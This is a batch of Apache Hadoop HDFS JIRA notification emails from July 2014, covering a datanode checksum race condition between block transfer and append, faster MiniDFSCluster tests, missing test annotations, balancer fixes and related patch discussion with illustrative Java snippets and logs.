[jira] [Commented] (HDFS-6804) race condition between transferring block and appending block causes "Unexpected checksum mismatch exception"

2014-07-31 Thread Gordon Wang (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6804?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081972#comment-14081972
 ] 

Gordon Wang commented on HDFS-6804:
---

Some thoughts about how to fix this issue. In my mind, there are two ways to 
fix it.
* Option1
When the block is opened for appending, check whether any DataTransfer 
threads are transferring the block to other DNs, and stop them. 
We can stop these threads because opening the block for appending increases 
its generation stamp, so the DataTransfer threads are sending an outdated 
replica. 

* Option2
In the DataTransfer thread, if the replica of the block is finalized, read the 
checksum of the last data chunk into memory and record the replica length in 
memory as well. Then, when sending the last data chunk, use the in-memory 
checksum instead of reading it from disk. 
This is similar to how DataTransfer handles an RBW replica.

For Option1, it is hard to stop a DataTransfer thread unless we add code to 
DataNode to manage DataTransfer threads.
For Option2, we would have to hold the FsDatasetImpl lock in the DataNode 
while reading the last chunk checksum from disk; otherwise, the last chunk 
might be overwritten concurrently. But disk reads take time, and performing 
expensive disk IO while holding the FsDatasetImpl lock could degrade DataNode 
performance.

Any opinions or comments are welcome!
Thanks.
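To make Option2 concrete, here is a minimal stand-alone sketch of the idea. 
The class and field names are invented for illustration (the real change would 
live in DataTransfer/FsDatasetImpl, and the lock object stands in for the 
FsDatasetImpl monitor): snapshot the replica length and the last chunk's 
checksum under the dataset lock when the transfer starts, and later send the 
snapshot instead of re-reading the checksum from disk.

```java
import java.util.zip.CRC32;

// Hypothetical sketch of Option 2: snapshot the finalized replica's length and
// last-chunk checksum in memory at transfer start, so a concurrent append
// cannot invalidate the checksum that will be sent for the last chunk.
public class TransferSnapshot {
    final long replicaLength;   // length recorded at transfer start
    final long lastChunkCrc;    // checksum of the (possibly partial) last chunk

    TransferSnapshot(byte[] replica, int chunkSize, Object datasetLock) {
        // Reading the on-disk checksum must happen under the dataset lock,
        // otherwise an append could overwrite the last chunk meanwhile.
        synchronized (datasetLock) {
            this.replicaLength = replica.length;
            int lastChunkStart = (replica.length / chunkSize) * chunkSize;
            if (lastChunkStart == replica.length && replica.length > 0) {
                lastChunkStart -= chunkSize; // last chunk is exactly full
            }
            CRC32 crc = new CRC32();
            crc.update(replica, lastChunkStart, replica.length - lastChunkStart);
            this.lastChunkCrc = crc.getValue();
        }
    }
}
```

When the sender reaches the last chunk, it would emit {{lastChunkCrc}} from 
memory rather than re-reading the checksum file; the trade-off discussed above 
is the disk read that now sits inside the lock.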

> race condition between transferring block and appending block causes 
> "Unexpected checksum mismatch exception" 
> --
>
> Key: HDFS-6804
> URL: https://issues.apache.org/jira/browse/HDFS-6804
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.2.0
>Reporter: Gordon Wang
>
> We found error logs like the following in the datanode:
> {noformat}
> 2014-07-22 01:49:51,338 INFO org.apache.hadoop.hdfs.server.datanode.DataNode: Exception for BP-2072804351-192.168.2.104-1406008383435:blk_1073741997_9248
> java.io.IOException: Terminating due to a checksum error.java.io.IOException: 
> Unexpected checksum mismatch while writing 
> BP-2072804351-192.168.2.104-1406008383435:blk_1073741997_9248 from 
> /192.168.2.101:39495
> at 
> org.apache.hadoop.hdfs.server.datanode.BlockReceiver.receivePacket(BlockReceiver.java:536)
> at 
> org.apache.hadoop.hdfs.server.datanode.BlockReceiver.receiveBlock(BlockReceiver.java:703)
> at 
> org.apache.hadoop.hdfs.server.datanode.DataXceiver.writeBlock(DataXceiver.java:575)
> at 
> org.apache.hadoop.hdfs.protocol.datatransfer.Receiver.opWriteBlock(Receiver.java:115)
> at 
> org.apache.hadoop.hdfs.protocol.datatransfer.Receiver.processOp(Receiver.java:68)
> at 
> org.apache.hadoop.hdfs.server.datanode.DataXceiver.run(DataXceiver.java:221)
> at java.lang.Thread.run(Thread.java:744)
> {noformat}
> While on the source datanode, the log says the block is transmitted.
> {noformat}
> 2014-07-22 01:49:50,805 INFO org.apache.hadoop.hdfs.server.datanode.DataNode: DataTransfer: Transmitted BP-2072804351-192.168.2.104-1406008383435:blk_1073741997_9248 (numBytes=16188152) to /192.168.2.103:50010
> {noformat}
> When the destination datanode gets the checksum mismatch, it reports a bad 
> block to the NameNode, and the NameNode marks the replica on the source 
> datanode as corrupt. But the replica on the source datanode is actually 
> valid, since it passes checksum verification.
> In short, the replica on the source datanode is wrongly marked as corrupt.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6773) MiniDFSCluster can run dramatically faster

2014-07-31 Thread Stephen Chu (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6773?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081959#comment-14081959
 ] 

Stephen Chu commented on HDFS-6773:
---

Thanks, Daryn. That sounds like a good approach.

I see 2 tests that call 
{{EditLogFileOutputStream.setShouldSkipFsyncForTesting(false);}}:
TestFsDatasetCache.java
TestCacheDirectives.java

I checked with Andrew and Colin, and we think fsync is probably not a 
requirement for the caching tests, because the unit tests aren't meant to be 
run with a power cycle in between. I will look into it more, and also go 
through the rest of the HDFS tests to see if any need fsync.
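For context, the speedup comes from skipping the {{FileChannel.force()}} call 
on every edit-log flush, which is what {{setShouldSkipFsyncForTesting}} 
toggles. A stand-alone timing sketch (file name and iteration count are 
arbitrary, and the absolute numbers depend on the disk) shows why durable 
writes dominate test runtime:

```java
import java.io.IOException;
import java.nio.ByteBuffer;
import java.nio.channels.FileChannel;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.StandardOpenOption;

// Stand-alone sketch: time N small writes with and without fsync
// (FileChannel.force), analogous to a durable vs non-durable edit log.
public class FsyncCost {
    static long timedWrites(Path p, int n, boolean fsync) throws IOException {
        long start = System.nanoTime();
        try (FileChannel ch = FileChannel.open(p,
                StandardOpenOption.CREATE, StandardOpenOption.WRITE)) {
            for (int i = 0; i < n; i++) {
                ch.write(ByteBuffer.wrap(new byte[]{(byte) i}));
                if (fsync) {
                    ch.force(false); // durable: flush to the storage device
                }
            }
        }
        return System.nanoTime() - start;
    }

    public static void main(String[] args) throws IOException {
        Path tmp = Files.createTempFile("editlog", ".bin");
        long durable = timedWrites(tmp, 200, true);
        long skipped = timedWrites(tmp, 200, false);
        System.out.printf("fsync: %d ms, no fsync: %d ms%n",
                durable / 1_000_000, skipped / 1_000_000);
        Files.deleteIfExists(tmp);
    }
}
```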

> MiniDFSCluster can run dramatically faster
> --
>
> Key: HDFS-6773
> URL: https://issues.apache.org/jira/browse/HDFS-6773
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: namenode
>Affects Versions: 2.0.0-alpha, 3.0.0
>Reporter: Daryn Sharp
>Assignee: Stephen Chu
>
> The mini cluster is unnecessarily running with durable edit logs.  The 
> following change cut runtime of a single test from ~30s to ~10s.
> {code}EditLogFileOutputStream.setShouldSkipFsyncForTesting(true);{code}
> The mini cluster should default to this behavior after identifying the few 
> edit log tests that probably depend on durable logs.





[jira] [Commented] (HDFS-6804) race condition between transferring block and appending block causes "Unexpected checksum mismatch exception"

2014-07-31 Thread Gordon Wang (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6804?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081955#comment-14081955
 ] 

Gordon Wang commented on HDFS-6804:
---

After checking the DataNode block-transfer code, I found a race condition 
while transferring a block to another datanode. The race causes the source 
datanode to send the wrong checksum for the last chunk of the replica.

Here is the root cause.
# DataNode DN1 receives a transfer-block command from the NameNode; say the 
command asks DN1 to transfer block B1 to DataNode DN2.
# DN1 creates a new DataTransfer thread, which is responsible for transferring 
B1 to DN2.
# When the DataTransfer thread is created, the replica of B1 is in the 
Finalized state. The thread then reads the replica content and checksum 
directly from disk and sends them to DN2.
# While the DataTransfer thread is sending data to DN2, block B1 is opened 
for appending. If the last data chunk of B1 is not full, its checksum will be 
overwritten by the BlockReceiver thread.
# The DataTransfer thread recorded the block length as the length before the 
append. Here comes the problem: when it sends the last data chunk to DN2, it 
reads the checksum of that chunk from disk and sends it along. But by this 
time the checksum has changed, because more data has been appended to the 
last data chunk.
# When DN2 receives the last data chunk and checksum, it throws the checksum 
mismatch exception.
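The mismatch in the last two steps can be reproduced in isolation: once extra 
bytes land in a partial chunk, the stored checksum covers the longer chunk and 
no longer matches the shorter byte range the transfer actually sends. A 
self-contained illustration, with CRC32 standing in for HDFS's per-chunk 
checksum and made-up byte values:

```java
import java.util.zip.CRC32;

// Illustrates the race: DataTransfer sends the old (shorter) last chunk but,
// after an append, reads from disk the checksum that covers the longer chunk.
public class LastChunkRace {
    static long crcOf(byte[] chunk) {
        CRC32 crc = new CRC32();
        crc.update(chunk);
        return crc.getValue();
    }

    public static void main(String[] args) {
        byte[] lastChunkBeforeAppend = {10, 20, 30};          // partial chunk
        byte[] lastChunkAfterAppend  = {10, 20, 30, 40, 50};  // after append

        long checksumOnDisk = crcOf(lastChunkAfterAppend);       // overwritten
        long checksumOfSentBytes = crcOf(lastChunkBeforeAppend); // what DN2 sees

        // DN2 recomputes the checksum over the 3 bytes it received and
        // compares it with the checksum DN1 read from disk -> mismatch.
        System.out.println("mismatch: " + (checksumOnDisk != checksumOfSentBytes));
    }
}
```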

Steps to reproduce
Prerequisites
# Change the code in DataNode.java to sleep for a while before sending the 
block. Make this change in the DataTransfer.run method.
{code}
// hack code here
try {
  LOG.warn("sleep 10 seconds before transfer the block:" + b);
  Thread.sleep(1000L * 10);
} catch (InterruptedException ie) {
  LOG.error("exception caught.", ie);
}
// hack code end

// send data & checksum
blockSender.sendBlock(out, unbufOut, null);
{code}

Steps
# Create an HDFS cluster with 1 NameNode NN and 1 DataNode DN1.
# Create a file F1 with an expected replication factor of 3. Write some data 
to the file and close it.
# Start a new DataNode DN2 to join the cluster.
# Grep the log of DN1; while the DataTransfer thread is sleeping, open F1, 
append some data, and hflush the data to DN1.

Then you can see DN2 throw a checksum mismatch exception when receiving the 
last block of file F1.

> race condition between transferring block and appending block causes 
> "Unexpected checksum mismatch exception" 
> --
>
> Key: HDFS-6804
> URL: https://issues.apache.org/jira/browse/HDFS-6804
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.2.0
>Reporter: Gordon Wang
>





[jira] [Created] (HDFS-6804) race condition between transferring block and appending block causes "Unexpected checksum mismatch exception"

2014-07-31 Thread Gordon Wang (JIRA)
Gordon Wang created HDFS-6804:
-

 Summary: race condition between transferring block and appending 
block causes "Unexpected checksum mismatch exception" 
 Key: HDFS-6804
 URL: https://issues.apache.org/jira/browse/HDFS-6804
 Project: Hadoop HDFS
  Issue Type: Bug
  Components: datanode
Affects Versions: 2.2.0
Reporter: Gordon Wang


We found error logs like the following in the datanode:
{noformat}
2014-07-22 01:49:51,338 INFO org.apache.hadoop.hdfs.server.datanode.DataNode: Exception for BP-2072804351-192.168.2.104-1406008383435:blk_1073741997_9248
java.io.IOException: Terminating due to a checksum error.java.io.IOException: 
Unexpected checksum mismatch while writing 
BP-2072804351-192.168.2.104-1406008383435:blk_1073741997_9248 from 
/192.168.2.101:39495
at 
org.apache.hadoop.hdfs.server.datanode.BlockReceiver.receivePacket(BlockReceiver.java:536)
at 
org.apache.hadoop.hdfs.server.datanode.BlockReceiver.receiveBlock(BlockReceiver.java:703)
at 
org.apache.hadoop.hdfs.server.datanode.DataXceiver.writeBlock(DataXceiver.java:575)
at 
org.apache.hadoop.hdfs.protocol.datatransfer.Receiver.opWriteBlock(Receiver.java:115)
at 
org.apache.hadoop.hdfs.protocol.datatransfer.Receiver.processOp(Receiver.java:68)
at 
org.apache.hadoop.hdfs.server.datanode.DataXceiver.run(DataXceiver.java:221)
at java.lang.Thread.run(Thread.java:744)
{noformat}
While on the source datanode, the log says the block is transmitted.
{noformat}
2014-07-22 01:49:50,805 INFO org.apache.hadoop.hdfs.server.datanode.DataNode: DataTransfer: Transmitted BP-2072804351-192.168.2.104-1406008383435:blk_1073741997_9248 (numBytes=16188152) to /192.168.2.103:50010
{noformat}

When the destination datanode gets the checksum mismatch, it reports a bad 
block to the NameNode, and the NameNode marks the replica on the source 
datanode as corrupt. But the replica on the source datanode is actually valid, 
since it passes checksum verification.

In short, the replica on the source datanode is wrongly marked as corrupt.





[jira] [Commented] (HDFS-6802) Some tests in TestDFSClientFailover are missing @Test annotation

2014-07-31 Thread Akira AJISAKA (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6802?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081921#comment-14081921
 ] 

Akira AJISAKA commented on HDFS-6802:
-

Attached a patch to
# add the {{@Test}} annotation
# fix the {{testWrappedFailoverProxyProvider()}} failure by configuring 
{{SecurityUtil}} not to use the IP address for the token service. 
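For anyone wondering why the methods were silently skipped: JUnit 4 discovers 
test methods by reflection and runs only those carrying {{@Test}}. A tiny 
stand-alone model of that discovery (the annotation here is a stand-in for 
{{org.junit.Test}}, not the real one):

```java
import java.lang.annotation.Retention;
import java.lang.annotation.RetentionPolicy;
import java.lang.reflect.Method;

// Minimal model of JUnit 4 test discovery: only methods carrying the @Test
// annotation are picked up; a method merely named test* is never invoked.
public class AnnotationDiscovery {
    @Retention(RetentionPolicy.RUNTIME)
    @interface Test {}  // stand-in for org.junit.Test

    static class SomeTests {
        @Test public void testAnnotated() {}
        public void testForgotten() {}  // looks like a test, never runs
    }

    static int runnableTests(Class<?> c) {
        int n = 0;
        for (Method m : c.getDeclaredMethods()) {
            if (m.isAnnotationPresent(Test.class)) n++;
        }
        return n;
    }

    public static void main(String[] args) {
        System.out.println(runnableTests(SomeTests.class)); // prints 1
    }
}
```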

> Some tests in TestDFSClientFailover are missing @Test annotation
> 
>
> Key: HDFS-6802
> URL: https://issues.apache.org/jira/browse/HDFS-6802
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: test
>Affects Versions: 2.5.0
>Reporter: Akira AJISAKA
>  Labels: newbie
> Attachments: HDFS-6802.patch
>
>
> HDFS-6334 added new tests in TestDFSClientFailover, but they are not 
> executed by the JUnit framework because they don't have the {{@Test}} 
> annotation.





[jira] [Updated] (HDFS-6802) Some tests in TestDFSClientFailover are missing @Test annotation

2014-07-31 Thread Akira AJISAKA (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6802?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Akira AJISAKA updated HDFS-6802:


Assignee: Akira AJISAKA
Target Version/s: 2.5.0
  Status: Patch Available  (was: Open)

> Some tests in TestDFSClientFailover are missing @Test annotation
> 
>
> Key: HDFS-6802
> URL: https://issues.apache.org/jira/browse/HDFS-6802
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: test
>Affects Versions: 2.5.0
>Reporter: Akira AJISAKA
>Assignee: Akira AJISAKA
>  Labels: newbie
> Attachments: HDFS-6802.patch
>
>
> HDFS-6334 added new tests in TestDFSClientFailover, but they are not 
> executed by the JUnit framework because they don't have the {{@Test}} 
> annotation.





[jira] [Updated] (HDFS-6802) Some tests in TestDFSClientFailover are missing @Test annotation

2014-07-31 Thread Akira AJISAKA (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6802?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Akira AJISAKA updated HDFS-6802:


Attachment: HDFS-6802.patch

> Some tests in TestDFSClientFailover are missing @Test annotation
> 
>
> Key: HDFS-6802
> URL: https://issues.apache.org/jira/browse/HDFS-6802
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: test
>Affects Versions: 2.5.0
>Reporter: Akira AJISAKA
>  Labels: newbie
> Attachments: HDFS-6802.patch
>
>
> HDFS-6334 added new tests in TestDFSClientFailover, but they are not 
> executed by the JUnit framework because they don't have the {{@Test}} 
> annotation.





[jira] [Created] (HDFS-6803) Documenting DFSClient#DFSInputStream expectations reading and preading in concurrent context

2014-07-31 Thread stack (JIRA)
stack created HDFS-6803:
---

 Summary: Documenting DFSClient#DFSInputStream expectations reading 
and preading in concurrent context
 Key: HDFS-6803
 URL: https://issues.apache.org/jira/browse/HDFS-6803
 Project: Hadoop HDFS
  Issue Type: Sub-task
  Components: hdfs-client
Affects Versions: 2.4.1
Reporter: stack
 Attachments: DocumentingDFSClientDFSInputStream (1).pdf

Reviews of the patch posted on the parent task suggest that we be more 
explicit about how DFSIS is expected to behave when being read by contending 
threads. It is also suggested that presumptions made internally be made 
explicit by documenting expectations.

Before we put up a patch, we've made a document of assertions we'd like to 
make into tenets of DFSInputStream. If there is agreement, we'll attach to 
this issue a patch that weaves the assumptions into DFSIS as javadoc and 
class comments. 
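The core distinction the document covers can be sketched in a toy class (this 
is an illustration of the two read paths, not DFSInputStream itself): the 
stateful read shares a seek position and needs synchronization, while 
positional pread takes its own offset and touches no shared state.

```java
// Toy model of the two read paths: the stateful read() advances a shared
// position and must be synchronized, while the positional read (pread) takes
// its own offset and can safely run from many threads concurrently.
public class PositionalReads {
    private final byte[] data;
    private int pos;  // shared state used only by the stateful read path

    PositionalReads(byte[] data) { this.data = data; }

    // Stateful read: advances the shared position.
    synchronized int read() {
        return pos < data.length ? data[pos++] & 0xff : -1;
    }

    // Positional read (pread): no shared state touched, safe concurrently.
    int read(long position, byte[] buf, int off, int len) {
        if (position >= data.length) return -1;
        int n = Math.min(len, data.length - (int) position);
        System.arraycopy(data, (int) position, buf, off, n);
        return n;
    }
}
```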







[jira] [Updated] (HDFS-6803) Documenting DFSClient#DFSInputStream expectations reading and preading in concurrent context

2014-07-31 Thread stack (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6803?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

stack updated HDFS-6803:


Attachment: DocumentingDFSClientDFSInputStream (1).pdf

First cut.  Please review and advise if we overstep.  Thanks.

> Documenting DFSClient#DFSInputStream expectations reading and preading in 
> concurrent context
> 
>
> Key: HDFS-6803
> URL: https://issues.apache.org/jira/browse/HDFS-6803
> Project: Hadoop HDFS
>  Issue Type: Sub-task
>  Components: hdfs-client
>Affects Versions: 2.4.1
>Reporter: stack
> Attachments: DocumentingDFSClientDFSInputStream (1).pdf
>
>
> Reviews of the patch posted on the parent task suggest that we be more 
> explicit about how DFSIS is expected to behave when being read by contending 
> threads. It is also suggested that presumptions made internally be made 
> explicit by documenting expectations.
> Before we put up a patch, we've made a document of assertions we'd like to 
> make into tenets of DFSInputStream. If there is agreement, we'll attach to 
> this issue a patch that weaves the assumptions into DFSIS as javadoc and 
> class comments. 





[jira] [Commented] (HDFS-6798) Add test case for incorrect data node condition during balancing

2014-07-31 Thread Hadoop QA (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6798?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081909#comment-14081909
 ] 

Hadoop QA commented on HDFS-6798:
-

{color:green}+1 overall{color}.  Here are the results of testing the latest 
attachment 
  http://issues.apache.org/jira/secure/attachment/12659010/HDFS-6798.patch
  against trunk revision .

{color:green}+1 @author{color}.  The patch does not contain any @author 
tags.

{color:green}+1 tests included{color}.  The patch appears to include 1 new 
or modified test files.

{color:green}+1 javac{color}.  The applied patch does not increase the 
total number of javac compiler warnings.

{color:green}+1 javadoc{color}.  There were no new javadoc warning messages.

{color:green}+1 eclipse:eclipse{color}.  The patch built with 
eclipse:eclipse.

{color:green}+1 findbugs{color}.  The patch does not introduce any new 
Findbugs (version 2.0.3) warnings.

{color:green}+1 release audit{color}.  The applied patch does not increase 
the total number of release audit warnings.

{color:green}+1 core tests{color}.  The patch passed unit tests in 
hadoop-hdfs-project/hadoop-hdfs.

{color:green}+1 contrib tests{color}.  The patch passed contrib unit tests.

Test results: 
https://builds.apache.org/job/PreCommit-HDFS-Build/7522//testReport/
Console output: https://builds.apache.org/job/PreCommit-HDFS-Build/7522//console

This message is automatically generated.

> Add test case for incorrect data node condition during balancing
> 
>
> Key: HDFS-6798
> URL: https://issues.apache.org/jira/browse/HDFS-6798
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: balancer
>Affects Versions: 2.4.1
>Reporter: Benoy Antony
>Assignee: Benoy Antony
> Attachments: HDFS-6798.patch
>
>
> The Balancer makes a check to see if a block's location is a known data node. 
> But the variable it uses to check is wrong. This issue was fixed in HDFS-6364.
> There was no way to easily unit test it at that time. Since HDFS-6441 enables 
> one to simulate this case, it was decided to add the unit test once HDFS-6441 
> is resolved.





[jira] [Commented] (HDFS-3482) hdfs balancer throws ArrayIndexOutOfBoundsException if option is specified without arguments

2014-07-31 Thread Hudson (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-3482?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081902#comment-14081902
 ] 

Hudson commented on HDFS-3482:
--

SUCCESS: Integrated in Hadoop-trunk-Commit #5993 (See 
[https://builds.apache.org/job/Hadoop-trunk-Commit/5993/])
HDFS-3482. Update CHANGES.txt. (arp: 
http://svn.apache.org/viewcvs.cgi/?root=Apache-SVN&view=rev&rev=1615019)
* /hadoop/common/trunk/hadoop-hdfs-project/hadoop-hdfs/CHANGES.txt


> hdfs balancer throws ArrayIndexOutOfBoundsException if option is specified 
> without arguments
> 
>
> Key: HDFS-3482
> URL: https://issues.apache.org/jira/browse/HDFS-3482
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: balancer
>Affects Versions: 2.0.0-alpha
>Reporter: Stephen Chu
>Assignee: madhukara phatak
>Priority: Minor
>  Labels: newbie
> Fix For: 3.0.0, 2.6.0
>
> Attachments: HDFS-3482-1.patch, HDFS-3482-2.patch, HDFS-3482-3.patch, 
> HDFS-3482-4.patch, HDFS-3482-4.patch, HDFS-3482.patch
>
>
> When running the hdfs balancer with an option but no argument, we run into an 
> ArrayIndexOutOfBoundsException. It's preferable to print the usage.
> {noformat}
> bash-3.2$ hdfs balancer -threshold
> Usage: java Balancer
> [-policy ]the balancing policy: datanode or blockpool
> [-threshold ]  Percentage of disk capacity
> Balancing took 261.0 milliseconds
> 12/05/31 09:38:46 ERROR balancer.Balancer: Exiting balancer due an exception
> java.lang.ArrayIndexOutOfBoundsException: 1
>   at 
> org.apache.hadoop.hdfs.server.balancer.Balancer$Cli.parse(Balancer.java:1505)
>   at 
> org.apache.hadoop.hdfs.server.balancer.Balancer$Cli.run(Balancer.java:1482)
>   at org.apache.hadoop.util.ToolRunner.run(ToolRunner.java:70)
>   at 
> org.apache.hadoop.hdfs.server.balancer.Balancer.main(Balancer.java:1555)
> bash-3.2$ hdfs balancer -policy
> Usage: java Balancer
> [-policy ]the balancing policy: datanode or blockpool
> [-threshold ]  Percentage of disk capacity
> Balancing took 261.0 milliseconds
> 12/05/31 09:39:03 ERROR balancer.Balancer: Exiting balancer due an exception
> java.lang.ArrayIndexOutOfBoundsException: 1
>   at 
> org.apache.hadoop.hdfs.server.balancer.Balancer$Cli.parse(Balancer.java:1520)
>   at 
> org.apache.hadoop.hdfs.server.balancer.Balancer$Cli.run(Balancer.java:1482)
>   at org.apache.hadoop.util.ToolRunner.run(ToolRunner.java:70)
>   at 
> org.apache.hadoop.hdfs.server.balancer.Balancer.main(Balancer.java:1555)
> {noformat}
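The fix direction can be sketched in a stand-alone snippet (this is an 
illustrative parser, not the actual Balancer$Cli code; the usage text mirrors 
the output above): before consuming an option's argument, check that it 
exists, and print usage instead of letting {{args[i + 1]}} throw.

```java
// Defensive CLI parsing: check that an option's argument is present before
// reading args[i + 1], avoiding the ArrayIndexOutOfBoundsException above.
public class SafeCliParse {
    static final String USAGE =
        "Usage: java Balancer\n"
      + "    [-policy <policy>]       the balancing policy: datanode or blockpool\n"
      + "    [-threshold <threshold>] Percentage of disk capacity";

    /** Returns the threshold, or null (after printing usage) on bad input. */
    static Double parseThreshold(String[] args) {
        for (int i = 0; i < args.length; i++) {
            if ("-threshold".equals(args[i])) {
                if (i + 1 >= args.length) {   // the missing bounds check
                    System.err.println(USAGE);
                    return null;
                }
                return Double.parseDouble(args[i + 1]);
            }
        }
        return 10.0; // default threshold when the option is absent
    }
}
```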





[jira] [Commented] (HDFS-6685) Balancer should preserve storage type of replicas

2014-07-31 Thread Hudson (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6685?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081900#comment-14081900
 ] 

Hudson commented on HDFS-6685:
--

SUCCESS: Integrated in Hadoop-trunk-Commit #5993 (See 
[https://builds.apache.org/job/Hadoop-trunk-Commit/5993/])
HDFS-6685. Balancer should preserve storage type of replicas. (szetszwo: 
http://svn.apache.org/viewcvs.cgi/?root=Apache-SVN&view=rev&rev=1615015)
* /hadoop/common/trunk/hadoop-hdfs-project/hadoop-hdfs/CHANGES.txt
* 
/hadoop/common/trunk/hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/StorageType.java
* 
/hadoop/common/trunk/hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/protocolPB/PBHelper.java
* 
/hadoop/common/trunk/hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/server/balancer/Balancer.java
* 
/hadoop/common/trunk/hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/server/balancer/BalancingPolicy.java
* 
/hadoop/common/trunk/hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/server/blockmanagement/BlockManager.java
* 
/hadoop/common/trunk/hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/server/protocol/BlocksWithLocations.java
* 
/hadoop/common/trunk/hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/util/EnumCounters.java
* 
/hadoop/common/trunk/hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/util/EnumDoubles.java
* /hadoop/common/trunk/hadoop-hdfs-project/hadoop-hdfs/src/main/proto/hdfs.proto
* 
/hadoop/common/trunk/hadoop-hdfs-project/hadoop-hdfs/src/test/java/org/apache/hadoop/hdfs/protocolPB/TestPBHelper.java


> Balancer should preserve storage type of replicas
> -
>
> Key: HDFS-6685
> URL: https://issues.apache.org/jira/browse/HDFS-6685
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: balancer
>Reporter: Tsz Wo Nicholas Sze
>Assignee: Tsz Wo Nicholas Sze
> Fix For: 2.6.0
>
> Attachments: h6685_20140728.patch, h6685_20140729.patch, 
> h6685_20140730.patch, h6685_20140730b.patch, h6685_20140731.patch
>
>
> When Balancer moves replicas to balance the cluster, it should always move 
> replicas from a storage with any type to another storage with the same type, 
> i.e. it preserves storage type of replicas.  It does not make sense to move 
> replicas to a different storage type.
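The constraint can be sketched in a few lines (the enum and Storage class are 
simplified stand-ins for HDFS's StorageType and storage descriptors, not the 
actual Balancer code): candidate targets are filtered down to storages whose 
type matches the source's.

```java
import java.util.ArrayList;
import java.util.List;

// Sketch of the rule the patch enforces: a replica may only move from a
// storage of some type to a target storage of the same type.
public class SameTypeTargets {
    enum StorageType { DISK, SSD, ARCHIVE }

    static class Storage {
        final String id;
        final StorageType type;
        Storage(String id, StorageType type) { this.id = id; this.type = type; }
    }

    // Keep only candidates whose type matches the source storage's type.
    static List<Storage> eligibleTargets(StorageType sourceType,
                                         List<Storage> candidates) {
        List<Storage> out = new ArrayList<>();
        for (Storage s : candidates) {
            if (s.type == sourceType) {
                out.add(s);
            }
        }
        return out;
    }
}
```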





[jira] [Commented] (HDFS-6797) DataNode logs wrong layoutversion during upgrade

2014-07-31 Thread Hudson (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6797?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081901#comment-14081901
 ] 

Hudson commented on HDFS-6797:
--

SUCCESS: Integrated in Hadoop-trunk-Commit #5993 (See 
[https://builds.apache.org/job/Hadoop-trunk-Commit/5993/])
HDFS-6797. DataNode logs wrong layoutversion during upgrade. (Contributed by 
Benoy Antony) (arp: 
http://svn.apache.org/viewcvs.cgi/?root=Apache-SVN&view=rev&rev=1615017)
* /hadoop/common/trunk/hadoop-hdfs-project/hadoop-hdfs/CHANGES.txt
* 
/hadoop/common/trunk/hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/server/datanode/BlockPoolSliceStorage.java


> DataNode logs wrong layoutversion during upgrade
> 
>
> Key: HDFS-6797
> URL: https://issues.apache.org/jira/browse/HDFS-6797
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.4.1
>Reporter: Benoy Antony
>Assignee: Benoy Antony
> Fix For: 3.0.0, 2.6.0
>
> Attachments: HDFS-6797.patch
>
>
> Before the upgrade, the data node version was -55, and the new data node 
> version remained at -55. During the upgrade we got the following messages:
> {code}
> 2014-07-15 12:59:55,253 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Data-node version: -55 and name-node layout version: -56
> ...
> ...
> ...
> ...
> 2014-07-15 12:59:56,479 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Upgrading block pool storage directory 
> /hadoop/1/data1/current/BP-825373266-xx.xxx.xxx.xx-1379095203239.
>old LV = -55; old CTime = 1402508907789.
>new LV = -56; new CTime = 1405453914270
> 2014-07-15 13:00:07,697 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Upgrade of block pool BP-825373266-xx.xxx.xxx.xx-1379095203239 at 
> /hadoop/12/data1/current/BP-825373266-xx.xxx.xxx.xx-1379095203239 is complete
